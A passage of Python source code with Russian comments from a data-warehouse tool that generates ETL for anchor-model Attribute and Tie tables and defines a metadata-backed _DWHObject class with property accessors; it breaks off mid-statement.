l_source_id=i_source_attribute.source_table.source.source_id
# генерируем etl для каждой таблицы источника
l_etl.append(
Connection().dbms.get_attribute_etl(
p_attribute_id=p_attribute_table.id,
p_attribute_column_id=l_attribute_column_id,
p_anchor_rk_id=l_attribute_rk_id,
p_from_dttm_id=l_from_dttm_id,
p_to_dttm_id=l_to_dttm_id,
p_etl_id=l_etl_id,
p_idmap_id=p_attribute_table.entity.idmap.id,
p_idmap_rk_id=l_idmap_rk_id,
p_idmap_nk_id=l_idmap_nk_id,
p_stg_table_id=i_source_attribute.source_table.id,
p_stg_attribute_id=l_column_value_id,
p_data_type=l_column_value_datatype,
p_attribute_concat_nk=l_column_nk_sql,
p_update_timestamp_id=l_update_timestamp_id,
p_source_id=l_source_id,
p_etl_value=p_etl_id
)
)
return l_etl
def get_tie_etl(
p_tie: object,
p_etl_id: str,
p_source_table: object =None
):
"""
Генерирует etl для таблицы Tie
:param p_tie: объект класса Tie
:param p_etl: id etl процесса
:param p_source_table: таблица источник, которую требуется загрузить в attribute
(если не указана, возвращается лист с etl всех таблиц источников)
"""
l_etl=[]
l_source_table_id=None
if p_source_table:
l_source_table_id=p_source_table.id
l_anchor_rk_id=None
l_link_anchor_rk_id=None
l_from_dttm_id=None
l_to_dttm_id=None
l_etl_id=None
l_idmap_rk_id=None
l_idmap_nk_id=None
l_link_idmap_rk_id=None
l_link_idmap_nk_id=None
for i_attribute in _get_table_attribute_property(p_table=p_tie):
if i_attribute.attribute_type==C_RK:
l_anchor_rk_id=i_attribute.id
if i_attribute.attribute_type==C_LINK_RK:
l_link_anchor_rk_id=i_attribute.id
if i_attribute.attribute_type==C_FROM:
l_from_dttm_id=i_attribute.id
if i_attribute.attribute_type==C_TO:
l_to_dttm_id=i_attribute.id
if i_attribute.attribute_type==C_ETL_ATTR:
l_etl_id=i_attribute.id
for i_attribute in p_tie.entity.idmap.idmap_attribute:
if i_attribute.attribute_type==C_RK:
l_idmap_rk_id=i_attribute.id
if i_attribute.attribute_type==C_NK:
l_idmap_nk_id=i_attribute.id
for i_attribute in p_tie.link_entity.idmap.idmap_attribute:
if i_attribute.attribute_type==C_RK:
l_link_idmap_rk_id=i_attribute.id
if i_attribute.attribute_type==C_NK:
l_link_idmap_nk_id=i_attribute.id
for i_source_table in p_tie.source_table:
if l_source_table_id and l_source_table_id!=i_source_table.id:
continue # пропускаем таблицу источник, если не она указана
l_column_nk_sql=""
l_source_attribute_nk=sorted(p_tie.entity.idmap.source_attribute_nk, key=lambda nk: nk.name)
for i_column_nk in l_source_attribute_nk:
if i_source_table.id==i_column_nk.source_table.id:
l_column_nk_sql=l_column_nk_sql+"CAST("+'"'+str(i_column_nk.id)+'"'+" AS VARCHAR(4000))\n\t\t||'@@'||\n\t\t"
l_link_column_nk_sql=""
for i_column_nk in p_tie.entity_attribute.source_attribute:
if i_source_table.id==i_column_nk.source_table.id:
l_link_column_nk_sql=l_link_column_nk_sql+"CAST("+'"'+str(i_column_nk.id)+'"'+" AS VARCHAR(4000))\n\t\t||'@@'||\n\t\t"
l_update_timestamp_id=None
for i_source_attribute in i_source_table.source_attribute:
if i_source_attribute.attribute_type==C_UPDATE:
l_update_timestamp_id=i_source_attribute.id
l_column_nk_sql=l_column_nk_sql[:-14]
l_link_column_nk_sql=l_link_column_nk_sql[:-14]
# генерируем etl для каждой таблицы источника
l_etl.append(
Connection().dbms.get_tie_etl(
p_tie_id=p_tie.id,
p_anchor_rk=l_anchor_rk_id,
p_link_anchor_rk=l_link_anchor_rk_id,
p_from_dttm_id=l_from_dttm_id,
p_to_dttm_id=l_to_dttm_id,
p_etl_id=l_etl_id,
p_idmap_id=p_tie.entity.idmap.id,
p_idmap_rk_id=l_idmap_rk_id,
p_idmap_nk_id=l_idmap_nk_id,
p_idmap_concat=l_column_nk_sql,
p_link_idmap_id=p_tie.link_entity.idmap.id,
p_link_idmap_rk_id=l_link_idmap_rk_id,
p_link_idmap_nk_id=l_link_idmap_nk_id,
p_link_idmap_concat=l_link_column_nk_sql,
p_stg_table_id=i_source_table.id,
p_update_timestamp_id=l_update_timestamp_id,
p_source_id=i_source_table.source.source_id,
p_etl_value=p_etl_id
)
)
return l_etl
def get_max_etl_id():
"""
Возвращает максимальный etl_id
"""
# вычисляем максимальный etl_id из метаданных
l_etls=meta.search_object(
p_type=C_ETL
)
l_etl_id_list=[0] # список etl_id, начинается с 0, так как в метаданных может не быть etl_id
for i_etl in l_etls:
l_etl_id_list.append(i_etl.attrs.get(C_ETL_ATTRIBUTE_NAME))
return max(l_etl_id_list)
class _DWHObject:
"""
Обхъект ХД
"""
def __init__(self,
p_type: str,
p_id: str =None,
p_name: str =None,
p_source_table =None,
p_source_attribute =None,
p_entity =None,
p_entity_attribute =None,
p_link_entity =None,
p_idmap =None,
p_idmap_attribute =None,
p_anchor =None,
p_anchor_attribute =None,
p_attribute_table =None,
p_attribute_table_attribute =None,
p_tie =None,
p_tie_attribute =None,
p_desc: str =None,
p_source =None
):
"""
Конструктор
:param p_type: тип объекта ХД
:param p_id: id объекта ХД
"""
self._type=p_type
self._id=p_id
self.l_id=copy.copy(uuid.uuid4()) # чтобы id не изменялся при каждом вызове
self._source_table=p_source_table
self._source_attribute=p_source_attribute
self._entity=p_entity
self._entity_attribute=p_entity_attribute
self._link_entity=p_link_entity
self._idmap=p_idmap
self._idmap_attribute=p_idmap_attribute
self._anchor=p_anchor
self._anchor_attribute=p_anchor_attribute
self._attribute_table=p_attribute_table
self._attribute_table_attribute=p_attribute_table_attribute
self._tie=p_tie
self._tie_attribute=p_tie_attribute
self._desc=p_desc
self._source=p_source
self._name=p_name
# проверяем, есть ли указанный id и определяем атрибуты из метаданных
self.object_attrs_meta=self.__object_attrs_meta()
@property
def id(self):
"""
Id объекта ХД
:return:
"""
if self._id is None:
return self.l_id
else:
return self._id
@property
def name(self):
"""
Наименование
"""
l_name=None
if self._name is not None:
l_name=self._name.lower()
return l_name or self.object_attrs_meta.get(C_NAME,None)
@name.setter
def name(self, p_new_name: str):
self._name=p_new_name
self.object_attrs_meta.pop(C_NAME, None)
def __object_attrs_meta(self):
"""
Атрибуты объекта ХД из метаданных
"""
l_attr_dict={} # словарь для атрибутов из метаданных
if self._id is not None:
l_meta_objs=meta.search_object(
p_type=self._type,
p_uuid=[self._id]
) # достаем метаданные источника
# проверяет на наличие источника в метаданных
if l_meta_objs.__len__()==0:
AbaseError(p_error_text="There's no "+self._type+" with id "+self._id, p_module="DWH", p_class="_DWHObject",
p_def="__object_attrs_meta").raise_error()
else:
l_attr_dict=l_meta_objs[0].attrs
return l_attr_dict
@property
def type(self):
"""
Тип объекта
"""
return self._type
@property
def source(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="Source",p_object=self._source)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_SOURCE,None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="Source")
return self._source or l_object
@source.setter
def source(self, p_new_source):
self._source=p_new_source
self.object_attrs_meta.pop(C_SOURCE, None)
@property
def source_table(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="SourceTable",p_object=self._source_table)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_QUEUE, None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="SourceTable")
return self._source_table or l_object
@source_table.setter
def source_table(self, p_new_source_table):
self._source_table=p_new_source_table
self.object_attrs_meta.pop(C_QUEUE, None)
@property
def source_attribute(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="Attribute",p_object=self._source_attribute)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_QUEUE_COLUMN,None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="Attribute", p_type=C_QUEUE_COLUMN)
return self._source_attribute or l_object
@source_attribute.setter
def source_attribute(self, p_new_source_attribute):
self._source_attribute=p_new_source_attribute
self.object_attrs_meta.pop(C_QUEUE_COLUMN, None)
@property
def entity(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="Entity",p_object=self._entity)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_ENTITY,None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="Entity")
return self._entity or l_object
@entity.setter
def entity(self, p_new_entity):
self._entity=p_new_entity
self.object_attrs_meta.pop(C_ENTITY, None)
@property
def link_entity(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="Entity",p_object=self._link_entity)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_LINK_ENTITY,None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="Entity")
return self._link_entity or l_object
@link_entity.setter
def link_entity(self, p_new_link_entity):
self._link_entity=p_new_link_entity
self.object_attrs_meta.pop(C_LINK_ENTITY, None)
@property
def entity_attribute(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="Attribute",p_object=self._entity_attribute)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_ENTITY_COLUMN,None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="Attribute",p_type=C_ENTITY_COLUMN)
return self._entity_attribute or l_object
@entity_attribute.setter
def entity_attribute(self, p_new_entity_attribute):
self._entity_attribute=p_new_entity_attribute
self.object_attrs_meta.pop(C_ENTITY_COLUMN, None)
@property
def idmap(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="Idmap",p_object=self._idmap)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_IDMAP, None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="Idmap")
return self._idmap or l_object
@idmap.setter
def idmap(self, p_new_idmap):
self._idmap=p_new_idmap
self.object_attrs_meta.pop(C_IDMAP, None)
@property
def idmap_attribute(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="Attribute",p_object=self._idmap_attribute)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_IDMAP_COLUMN,None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="Attribute",p_type=C_IDMAP_COLUMN)
return self._idmap_attribute or l_object
@idmap_attribute.setter
def idmap_attribute(self, p_new_idmap_attribute):
self._idmap_attribute=p_new_idmap_attribute
self.object_attrs_meta.pop(C_IDMAP_COLUMN, None)
@property
def anchor(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="Anchor",p_object=self._anchor)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_ANCHOR, None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="Anchor")
return self._anchor or l_object
@anchor.setter
def anchor(self, p_new_anchor):
self._anchor=p_new_anchor
self.object_attrs_meta.pop(C_ANCHOR, None)
@property
def anchor_attribute(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="Attribute",p_object=self._anchor_attribute)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_ANCHOR_COLUMN,None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="Attribute",p_type=C_ANCHOR_COLUMN)
return self._anchor_attribute or l_object
@anchor_attribute.setter
def anchor_attribute(self, p_new_anchor_attribute):
self._anchor_attribute=p_new_anchor_attribute
self.object_attrs_meta.pop(C_ANCHOR_COLUMN, None)
@property
def attribute_table(self):
"""
Таблицы источники
"""
# проверка объекта
_class_checker(p_class_name="AttributeTable",p_object=self._attribute_table)
# собираем метаданные, если указаны
l_meta_obj=self.object_attrs_meta.get(C_ATTRIBUTE_TABLE, None)
# выбираем из метаданных
l_object=_get_object(p_id=l_meta_obj, p_class_name="AttributeTable")
return |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.